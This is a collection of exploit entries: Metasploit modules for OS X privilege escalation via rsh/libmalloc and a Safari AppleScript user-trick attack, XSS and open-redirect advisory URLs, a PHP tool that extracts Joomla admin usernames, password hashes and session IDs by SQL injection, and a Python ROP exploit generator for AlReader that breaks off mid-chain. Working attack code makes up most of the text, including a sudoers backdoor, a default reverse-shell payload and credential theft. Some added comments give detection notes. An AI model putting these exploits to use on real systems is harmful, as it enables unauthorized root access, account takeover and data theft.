
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Local
  # Local privilege escalation for OS X 10.9.5 - 10.10.5 (CVE-2015-5889, EDB 38371;
  # fixed in 10.11 according to the Description below).
  #
  # What the code does (see #sploit): spawns /usr/bin/rsh with MallocLogFile set to
  # /etc/crontab and a crontab line embedded in MallocStackLoggingDirectory, so the
  # libmalloc stack-logging output written to /etc/crontab carries a root cron job
  # that appends "ALL ALL=(ALL) NOPASSWD: ALL" to /etc/sudoers. The module then
  # waits for /etc/sudoers to grow and launches the payload. Why rsh's log output
  # ends up in a root-owned file is not shown here (presumably rsh runs with
  # elevated privileges) - see the references.
  #
  # Defender notes, all derived from what this code touches:
  #   - file-integrity monitoring on /etc/crontab and /etc/sudoers catches both the
  #     planted cron line and the appended sudoers rule;
  #   - process auditing: `ruby -e` spawning /usr/bin/rsh localhost from a user
  #     session, `sudo -s su`, and a random 8-letter executable under WritableDir
  #     (default /.Trashes);
  #   - #cleanup restores or removes /etc/crontab but never touches /etc/sudoers,
  #     so the NOPASSWD line persists after the session ends.

  Rank = NormalRanking

  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options. WaitTime bounds the poll loop in #sploit;
  # WritableDir is where the native payload file is dropped (see #payload_file).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation',
      'Description'    => %q{
        This module writes to the sudoers file without root access by exploiting rsh and malloc log files.
        Makes sudo require no password, giving access to su even if root is disabled.
        Works on OS X 10.9.5 to 10.10.5 (patched on 10.11).
      },
      'Author'         => [
        'rebel',      # Vulnerability discovery and PoC
        'shandelman116'  # Copy/paste AND translator monkey
      ],
      'References'     => [
        ['EDB', '38371'],
        ['CVE', '2015-5889']
      ],
      'DisclosureDate' => 'Oct 1 2015',
      'License'        => MSF_LICENSE,
      # Want to ensure that this can be used on Python Meterpreter sessions as well
      'Platform'       => ['osx', 'python'],
      'Arch'           => [ARCH_X86_64, ARCH_PYTHON],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Targets'        => [
        ['Mac OS X 10.9.5-10.10.5', {}]
      ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
      }
    ))

    register_options(
      [
        OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
        OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
      ], self.class
    )
  end

  # Module entry point: sanity-check the OS, snapshot /etc/crontab so #cleanup can
  # restore it, stage the payload, run the crontab/sudoers trick, then launch the
  # payload in the background.
  # NOTE(review): #os_check only prints warnings; nothing aborts on a mismatched
  # target, so everything below runs regardless of the check's outcome.
  def exploit
    # Check OS
    os_check

    # Check if crontab file existed already so it can be restored at cleanup
    # (@crontab_original == nil means "did not exist", see #cleanup).
    if file_exist? "/etc/crontab"
      @crontab_original = read_file("/etc/crontab")
    else
      @crontab_original = nil
    end

    # Writing payload
    # Native x64 payloads are dropped as a Mach-O under WritableDir and registered
    # with FileDropper; python payloads are run inline and leave no file behind.
    if payload.arch.include? ARCH_X86_64
      vprint_status("Writing payload to #{payload_file}.")
      write_file(payload_file, payload_source)
      vprint_status("Finished writing payload file.")
      register_file_for_cleanup(payload_file)
    elsif payload.arch.include? ARCH_PYTHON
      vprint_status("No need to write payload. Will simply execute after exploit")
      # Logs the complete encoded payload at verbose level.
      vprint_status("Payload encodeded is #{payload.encoded}")
    end

    # Run exploit
    sploit

    # Execute payload
    # Both forms background the payload with "& disown" so the command returns.
    print_status('Executing payload...')
    if payload.arch.include? ARCH_X86_64
      cmd_exec("chmod +x #{payload_file}; #{payload_file} & disown")
    elsif payload.arch.include? ARCH_PYTHON
      cmd_exec("python -c \"#{payload.encoded}\" & disown")
    end
    vprint_status("Finished executing payload.")
  end

  # Warns (does not abort) when the session does not look like OS X 10.9.5 - 10.10.5.
  # Reads "Kernel" and "ProductVersion" from get_sysinfo (Msf::Post::OSX::System).
  def os_check
    # Get sysinfo
    sysinfo = get_sysinfo
    # Make sure its OS X (Darwin)
    unless sysinfo["Kernel"].include? "Darwin"
      print_warning("The target system does not appear to be running OS X!")
      print_warning("Kernel information: #{sysinfo['Kernel']}")
      return
    end
    # Make sure its not greater than 10.5 or less than 9.5
    version = sysinfo["ProductVersion"]
    # Drops the leading "10." and parses the rest as a float: "10.10.5" -> 10.5,
    # "10.9.5" -> 9.5. NOTE(review): this is lossy - "10.10" becomes 10.0 and
    # passes, "10.9" becomes 9.0 and fails - and a nil/short ProductVersion raises
    # here instead of warning.
    minor_version = version[3...version.length].to_f
    unless minor_version >= 9.5 && minor_version <= 10.5
      print_warning("The target version of OS X does not appear to be compatible with the exploit!")
      print_warning("Target is running OS X #{sysinfo['ProductVersion']}")
    end
  end

  # Core of the module: plants the cron line via rsh/libmalloc, waits for
  # /etc/sudoers to grow, then tries to become root with sudo.
  # Raises through fail_with (NotVulnerable, TimeoutExpired, UnexpectedReply).
  def sploit
    user = cmd_exec("whoami").chomp
    vprint_status("The current effective user is #{user}. Starting the sploit")
    # Get size of sudoers file
    sudoer_path = "/etc/sudoers"
    size = get_stat_size(sudoer_path)

    # Set up the environment and command for spawning rsh and writing to crontab file
    # The env hash points libmalloc's log at /etc/crontab and smuggles a newline-
    # separated "* * * * * root echo ... >> /etc/sudoers" entry in through
    # MallocStackLoggingDirectory, so the logged line doubles as a valid crontab
    # entry. rsh's stdout/stderr are discarded. Requires a `ruby` on the target.
    rb_script = "e={\"MallocLogFile\"=>\"/etc/crontab\",\"MallocStackLogging\"=>\"yes\",\"MallocStackLoggingDirectory\"=>\"a\n* * * * * root echo \\\"ALL ALL=(ALL) NOPASSWD: ALL\\\" >> /etc/sudoers\n\n\n\n\n\"}; Process.spawn(e,[\"/usr/bin/rsh\",\"rsh\"],\"localhost\",[:out, :err]=>\"/dev/null\")"
    rb_cmd = "ruby -e '#{rb_script}'"

    # Attempt to execute
    print_status("Attempting to write /etc/crontab...")
    cmd_exec(rb_cmd)
    vprint_status("Now to check whether the script worked...")

    # Check whether it worked
    crontab = cmd_exec("cat /etc/crontab")
    vprint_status("Reading crontab yielded the following response: #{crontab}")
    unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
      vprint_error("Bad news... it did not write to the file.")
      fail_with(Failure::NotVulnerable, "Could not successfully write to crontab file.")
    end

    print_good("Succesfully wrote to crontab file!")

    # Wait for sudoers to change
    new_size = get_stat_size(sudoer_path)
    print_status("Waiting for sudoers file to change...")

    # Start timeout block
    # Polls the sudoers size once per second until it grows or WaitTime elapses;
    # cron runs the planted entry at most once a minute, hence the 60 s default.
    begin
      Timeout.timeout(datastore['WaitTime']) {
        while new_size <= size
          Rex.sleep(1)
          new_size = get_stat_size(sudoer_path)
        end
      }
    rescue Timeout::Error
      fail_with(Failure::TimeoutExpired, "Sudoers file size has still not changed after waiting the maximum amount of time. Try increasing WaitTime.")
    end
    print_good("Sudoers file has changed!")

    # Confirming root access
    # NOTE(review): these are two separate cmd_exec calls; whether `whoami` runs
    # inside the shell started by `sudo -s su` depends on how the session type
    # handles an interactive child shell - confirm on both shell and meterpreter.
    print_status("Attempting to start root shell...")
    cmd_exec("sudo -s su")
    user = cmd_exec("whoami")
    unless user.include? "root"
      fail_with(Failure::UnexpectedReply, "Unable to acquire root access. Whoami returned: #{user}")
    end
    print_good("Success! Acquired root access!")
  end

  # Returns the size in bytes of file_path on the target as an Integer.
  # `stat -s` (BSD stat) prints st_*=value shell assignments; they are handed to an
  # empty environment and a child bash echoes $st_size. NOTE(review): the literal
  # [ ] around the $(...) expansion become part of the first and last NAME=VALUE
  # pair given to env; it appears to work but is unusual - confirm.
  # Fails the module with UnexpectedReply when the output is not an integer.
  # NOTE(review): Integer(nil) raises TypeError, which this rescue does not catch.
  def get_stat_size(file_path)
    cmd = "env -i [$(stat -s #{file_path})] bash -c 'echo $st_size'"
    response = cmd_exec(cmd)
    vprint_status("Response to stat size query is #{response}")
    begin
      size = Integer(response)
      return size
    rescue ArgumentError
      fail_with(Failure::UnexpectedReply, "Could not get stat size!")
    end
  end

  # Bytes to write for the staged payload: a Mach-O for x64, the raw encoded
  # payload for python. Returns nil for any other arch (implicit).
  def payload_source
    if payload.arch.include? ARCH_X86_64
      return Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    elsif payload.arch.include? ARCH_PYTHON
      return payload.encoded
    end
  end

  # Memoized path of the dropped payload: WritableDir plus a random 8-letter name.
  def payload_file
    @payload_file ||=
      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
  end

  # Post-exploit cleanup. super lets FileDropper delete the registered payload
  # file; the rest undoes the crontab change. /etc/sudoers is intentionally not
  # restored here, so the NOPASSWD rule remains on the host.
  def cleanup
    vprint_status("Starting the cron restore process...")
    super
    # Restore crontab back to is original state
    # If we don't do this, then cron will continue to append the no password rule to sudoers.
    if @crontab_original.nil?
      # Erase crontab file and kill cron process since it did not exist before
      vprint_status("Killing cron process and removing crontab file since it did not exist prior to exploit.")
      rm_ret = cmd_exec("rm /etc/crontab 2>/dev/null; echo $?")
      if rm_ret.chomp.to_i == 0
        vprint_good("Successfully removed crontab file!")
      else
        print_warning("Could not remove crontab file.")
      end
      Rex.sleep(1)
      kill_ret = cmd_exec("killall cron 2>/dev/null; echo $?")
      if kill_ret.chomp.to_i == 0
        vprint_good("Succesfully killed cron!")
      else
        print_warning("Could not kill cron process.")
      end
    else
      # Write back the original content of crontab
      # NOTE(review): the content is interpolated inside single quotes; a crontab
      # containing a ' character breaks this command and the restore silently
      # fails (no exit status is checked here, unlike the branch above).
      vprint_status("Restoring crontab file back to original contents. No need for it anymore.")
      cmd_exec("echo '#{@crontab_original}' > /etc/crontab")
    end
    vprint_status("Finished the cleanup process.")
  end
end
            
source: https://www.securityfocus.com/bid/60198/info

ADIF Log Search widget plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

ADIF Log Search 1.0e is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E<http://www.example2.com/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E> 
            
source: https://www.securityfocus.com/bid/60172/info

Barracuda SSL VPN 680 is prone to an open-redirection vulnerability.

An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Barracuda SSL VPN 680 2.2.2.203 is vulnerable; other versions may also be affected. 

https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=%2FshowApplicationShortcuts.do
https://www.example.com/launchApplication.do?resourceId=1&policy=1&returnTo=http://www.example.com
https://www.example.com/[FILE].do?[RES+ID]=x&[POLICY]=x&returnTo=[EXTERNAL TARGET] 
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # Browser-served, user-assisted command execution against Safari on OS X before
  # 10.11.1 (CVE-2015-7007, Apple HT205375). The served page's keydown handler
  # navigates to an applescript:// URL when the cmd key (keyCode 91) goes down;
  # the Description covers the rest of the required user interaction.
  #
  # Defender notes, taken from the strings this module emits:
  #   - the script body is `do shell script "echo <base64> | base64 --decode | /bin/sh"`
  #     padded with ~150 leading newlines, and the decoded command starts with
  #     `killall "Script Editor"; nohup ...` - Script Editor spawning /bin/sh with a
  #     base64 --decode pipeline is the process-tree indicator;
  #   - Safari handing an applescript://com.apple.scripteditor?action=new URL to
  #     Script Editor is the URL-handler indicator; per the Description the scheme
  #     is no longer provided from 10.11.1 on.
  Rank = ManualRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. Only Safari on OS X is served (BrowserRequirements);
  # CONTENT is the decoy text shown on the page, WritableDir is registered but
  # not read anywhere in this class.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Safari User-Assisted Applescript Exec Attack',
      'Description'    => %q{
        In versions of Mac OS X before 10.11.1, the applescript:// URL
        scheme is provided, which opens the provided script in the Applescript
        Editor. Pressing cmd-R in the Editor executes the code without any
        additional confirmation from the user. By getting the user to press
        cmd-R in Safari, and by hooking the cmd-key keypress event, a user
        can be tricked into running arbitrary Applescript code.

        Gatekeeper should be disabled from Security & Privacy in order to
        avoid the unidentified Developer prompt.
      },
      'License'         => MSF_LICENSE,
      'Arch'            => ARCH_CMD,
      'Platform'        => ['unix', 'osx'],
      'Compat'          =>
        {
          'PayloadType' => 'cmd'
        },
      'Targets'         =>
        [
          [ 'Mac OS X', {} ]
        ],
      'DefaultOptions' => { 'payload' => 'cmd/unix/reverse_python' },
      'DefaultTarget'   => 0,
      'DisclosureDate'  => 'Oct 16 2015',
      'Author'          => [ 'joev' ],
      'References'     =>
        [
          [ 'CVE', '2015-7007' ],
          [ 'URL', 'https://support.apple.com/en-us/HT205375' ]
        ],
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::SAFARI,
        :os_name => OperatingSystems::Match::MAC_OSX
      }
    ))

    register_options([
      OptString.new('CONTENT', [false, "Content to display in browser",
        "This page has failed to load. Press cmd-R to refresh."]),
      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
    ], self.class)
  end

  # BrowserExploitServer callback: every matching client gets the same page.
  def on_request_exploit(cli, request, profile)
    print_status("Sending #{self.name}")
    send_response_html(cli, exploit_html)
  end

  # Full HTML document: decoy text followed by the handler script.
  # NOTE(review): CONTENT is interpolated raw (no HTML escaping); it is
  # operator-supplied, so this only matters if the option ever carries untrusted text.
  def exploit_html
    "<!doctype html><html><body>#{content}<script>#{exploit_js}</script></body></html>"
  end

  # Obfuscated JavaScript. `as` is the AppleScript source: 150 newlines (presumably
  # to push the real line out of the editor's initial view - confirm) followed by a
  # `do shell script` that base64-decodes #sh and pipes it to /bin/sh. The `\|`
  # escapes are needed because %Q|...| uses | as the literal delimiter.
  def exploit_js
    js_obfuscate %Q|
      var as = Array(150).join("\\n") +
        'do shell script "echo #{Rex::Text.encode_base64(sh)} \| base64 --decode \| /bin/sh"';
      var url = 'applescript://com.apple.scripteditor?action=new&script='+encodeURIComponent(as);
      window.onkeydown = function(e) {
        if (e.keyCode == 91) {
          window.location = url;
        }
      };
    |
  end

  # Shell command carried by the script: closes Script Editor first, then runs
  # the cmd payload detached via nohup.
  def sh
    'killall "Script Editor"; nohup ' + payload.encoded
  end

  # Decoy page text from the CONTENT option.
  def content
    datastore['CONTENT']
  end


end
            
<?php session_start();
// "Mannu": a web front-end that drives a Joomla com_contenthistory SQL injection
// (the request is built in the sm1 handler further down). error_reporting(0)
// hides every warning - including the undefined-index notices the parsing code
// below would otherwise raise - and set_time_limit(0) lets a request run forever.
error_reporting(0);
set_time_limit(0);

// Static page header: favicon, title, CSS and the lhook() display toggle.
// NOTE(review): the </script> right after the <link> has no opening tag; it is
// inside the string literal and is left untouched here.
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}

input {
border			: solid 2px ;
border-color		: black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;

color: white;
}

submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}

#t input[type=\'submit\']{
	COLOR: White;
	border:none;
	BACKGROUND-COLOR: black;
}

#t input[type=\'submit\']:hover {
	
	BACKGROUND-COLOR: #ff9933;
	color: black;
	
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border			: dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
	COLOR: red; TEXT-DECORATION: none
}
A:visited {
	COLOR: red; TEXT-DECORATION: none
}
A:hover {
	color: White; TEXT-DECORATION: none
}
A:active {
	color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
    function lhook(id) {
       var e = document.getElementById(id);
       if(e.style.display == \'block\')
          e.style.display = \'none\';
       else
          e.style.display = \'block\';
    }
//-->
</script>
'; 



		// Emit the header, then the banner/greetz table shown above the form.
		echo $head ;
		echo '

<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >

			

       <td width="100%" align=center valign="top" rowspan="1">
           <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr"> 

        <td height="10" align="left" class="td1"></td></tr><tr><td 
        width="100%" align="center" valign="top" rowspan="1"><font 
        color="red" face="comic sans ms"size="1"><b> 
        <font color=#ff9933> 
        ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
        -==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font>        <br></font>
        <b> 
        <font color=#ff9933> 
        ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
						
           </table>
       </table> <br>

';
?>
<div align=center>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="check version">

<?php
 /**
  * Fetches $lu with one HTTP GET through cURL and returns the response body.
  *
  * @param string $lu URL to request; used verbatim, no scheme or host validation.
  * @return string|false Response body, or false when curl_exec fails.
  *
  * NOTE(review): CURLOPT_SSL_VERIFYPEER is disabled, so HTTPS targets are fetched
  * without certificate validation. Only a 5 s connect timeout is set (no overall
  * CURLOPT_TIMEOUT), and the curl error state is never inspected.
  */
 function data($lu)
{
	$options = array(
		CURLOPT_URL            => $lu,
		CURLOPT_HEADER         => 0,
		CURLOPT_RETURNTRANSFER => 1,
		CURLOPT_CONNECTTIMEOUT => 5,
		CURLOPT_SSL_VERIFYPEER => false,
		CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8',
	);

	$handle = curl_init();
	curl_setopt_array($handle, $options);
	$body = curl_exec($handle);
	curl_close($handle);

	return $body;
}


// Step 1 ("check version"): fetch <target>/language/en-GB/en-GB.xml and read its
// <version> element. The target URL comes straight from POST input with no
// validation, and it is later echoed back into the page without escaping.
// NOTE(review): if the XML has no <version> tag, $ar0[1] is undefined and the
// code below silently works on an empty string (masked by error_reporting(0)).
if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$finalurl=$target."/language/en-GB/en-GB.xml";

// file_get_contents on a user-supplied URL: no scheme check and no timeout.
$data=file_get_contents($finalurl);	
$ar0=explode("<version>", $data);
$ar1=explode("</version>", $ar0[1]);
$ar=trim($ar1[0]);
echo "<br>";
$v=explode(".",$ar);


// Compares the major version only; $v[0] <= 3 also matches Joomla 1.x / 2.x,
// which the closing comment at the end of the file ("3.2.* to 3.4.4") excludes.
if($v[0]<=3)
{
	//echo "<br><br> Joomla version is 3.*.*";
	
		
		//echo "<br> yes yes >:D<, fas gaya billu ";
		echo "<br>click below button to exploit it :v <br><br>" ;
		// $target lands in an unquoted value= attribute: reflected XSS in this tool's own UI.
		echo "<form method=post><input type=hidden name=tar value=".$target.">";
		echo "<input type=submit name=sm1 value=\"Chal billu, ghuma de soday ne xD\">";
	
	
}
else{
	
	// Reached when the major version is greater than 3; the message says the opposite.
	echo "joomla version is below 3";
}

}

// Step 2 (the exploit button): builds a com_contenthistory request whose
// list[select] parameter carries SQL and parses what the target's database error
// text echoes back. The first request uses a placeholder table prefix ("icalab")
// only to learn the real prefix from the "LEFT JOIN ..._users" error; later
// requests substitute it and read the "Duplicate entry ... for key" fragment.
//
// Detection: requests to index.php?option=com_contenthistory&view=history with a
// list[select] value containing select/concat/information_schema are the
// signature; the fixed item_id=75 / type_id=1 pair also stands out in access logs.
// NOTE(review): $_POST['tar'] is used verbatim in the outbound URL and echoed
// unescaped into the result page; when parsing fails nothing at all is printed.
if(isset($_POST['sm1']))
{

$tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";

// Prefix discovery: text between "LEFT JOIN" and "_users" in the error response.
$dat=data($tar); 
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);

// Same request with the learned prefix; $ar1[0] becomes the password-hash fragment.
$rt=str_replace("icalab",$ar,$tar);
$tr=data($rt);
$ar0=explode("Duplicate entry", $tr);
$ar1=explode("for key", $ar0[1]);


// Third request swaps the selected column for username; $ar3[0] is its fragment.
 $rt2=str_replace("password","username,0x7e",$rt);
$tr2=data($rt2);
$ar2=explode("Duplicate entry", $tr2);
$ar3=explode("for key", $ar2[1]);

if($ar3[0]!='' && $ar1[0]!='')
{
echo "<br><br> 	Target gone 8-)<br><br>website name:- ".$_POST['tar']." <br>-------------------------------<br> <br>";
echo "username is --> ".str_replace("~1","",trim($ar3[0]))." <br>Password Hash is --> ".str_replace("~1","",trim($ar1[0]));
echo "<br>Admin session ID is<br></div>";
// Fourth request targets the <prefix>_session table for the admin session id.
$sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";

$ses=data($sessionid);
$ar0=explode("Duplicate entry", $ses);
$ar1=explode("for key", $ar0[1]);
echo trim($ar1[0]);
}
}

?>
<!-- 3.2.* to 3.4.4 -->
            
#!/usr/bin/env python

#*************************************************************************************************************
# Exploit Title:          Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date:                   25.10.2015
# Category:               Local Exploit
# Exploit Author:         g00dv1n
# Contact:                g00dv1n.private@gmail.com
# Version:                2.5
# Tested on:              Windows XP SP3 / Windows 7 / Windows 8 
# Vendor Homepage:        http://www.alreader.com/index.php?lang=en
# Software Link (ENG):    http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU):     http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE: 



# Description:
# AlReader 2.5 is a free FB2 reader for Windows.
# The FB2 format is just XML. An FB2 file contains an <author> <first-name> </first-name> </author> block.
# Overflow occurs if you create a long name of the author.
# App used WCHAR  (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41  -  00 41 00 41
# So We should use UTF-16. 
#
# Also, we can use single null byte in payload.
# 
# 
#
# Instructions:  
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit overview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload 
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP 
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
# 
# Program have Russian (RU) and English (Eng) versions. 
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For the Eng version, after ADD ESP, 808h RETN 4 and the ROP NOPs, yet another exception arises and calls ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload: 
#
#                              =-------------------------=
#                              |          gdvn           |        just fan magic bytes       
#                              |-------------------------|                         
#                              |                         |
#                              |  jmp from SEH address   |        x 500    Spray address to jump to from the overwritten SEH
#                              |                         |                        (ADD ESP, 808h RETN 4) 
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 500    Spray  ROP NOP (RETN)   
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       RU version        |
#                              |                         |
#                              |-------------------------|                         
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |        ROP NOP          |        x 250     Spray  ROP NOP (RETN) 
#                              |                         |
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |        SHELLCODE        |        Run Calc.exe
#                              |-------------------------|                         
#                              |                         |
#                              |      ROP chain for      |
#                              |       ENG version       |
#                              |                         |
#                              |-------------------------|                          
#                              |                         |
#                              |                         |
#                              |          Junk           |        'A' x 6000
#                              |                         |                         
#                              |                         |
#                              =-------------------------=
#
#
#
# 
#
#**************************************************************************************************************




#######################################################################################################
from struct import *

#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"


########################################################################################################

fuz_text  = ''                                # init fuzzy string 




jmp_to  = pack('<I',0x00442391 )              # 0x00442391 ADD ESP, 808h RETN 4

ret_NOP =  pack('<I',0x00448147 )             # RETN


##################################### START CREATE ROP CHAINs ############################################

fuz_text += 'gdvn'                              # magic init bytes



fuz_text += jmp_to * 500                        # spray adr



fuz_text += ret_NOP * 500                       # spray RETN adr



####################################### ROP CHAIN FOR RUS VERSION ########################################

# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr 
# EBP = ptr to unicode 'kernel32.dll'
                  
ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC )     # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 )              # 0x0560944 ptr to unicode 'kernel32.dll'


#0x004904a6 :  #  POP EDI # POP ESI # POP EBP # POP EBX # RETN 
fuz_text +=  pack('<I',0x004904a6 )   + module_handlew_adr + ret_adr_after + kernel32_u

fuz_text +=  '\x41' *  4

                                                
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36

fuz_text += pack('<I',0x004b310d )              # 0x004b310d :  # PUSHAD # RETN

fuz_text +=  '\x41' *  28                       # correct after ADD ESP,30


#Junk
#################################################
fuz_text +=  pack('<I',0x004f831c )             # 0x004f831c # ADD ESP,24 # RETN

fuz_text +=  '\x41' *  36
#################################################

#EAX = kernel32 base adr

# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr 
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'


ret_adr_after = pack('<I',0x0048ddd1 )          # 0x0048ddd1 :  # ADD ESP,30 # RETN    ( this need to correct ESP )             

get_proc_adr  = pack('<I',0x0043C8B2 )          # 0x0043C8B2 - GetProcAdress


# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN

fuz_text += pack('<I',0x004904A8 )  + get_proc_adr +  ret_adr_after           

fuz_text +=  '\x41' *  8


fuz_text += pack('<I',0x004b9e9e )             # 0x004b9e9e :  # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN

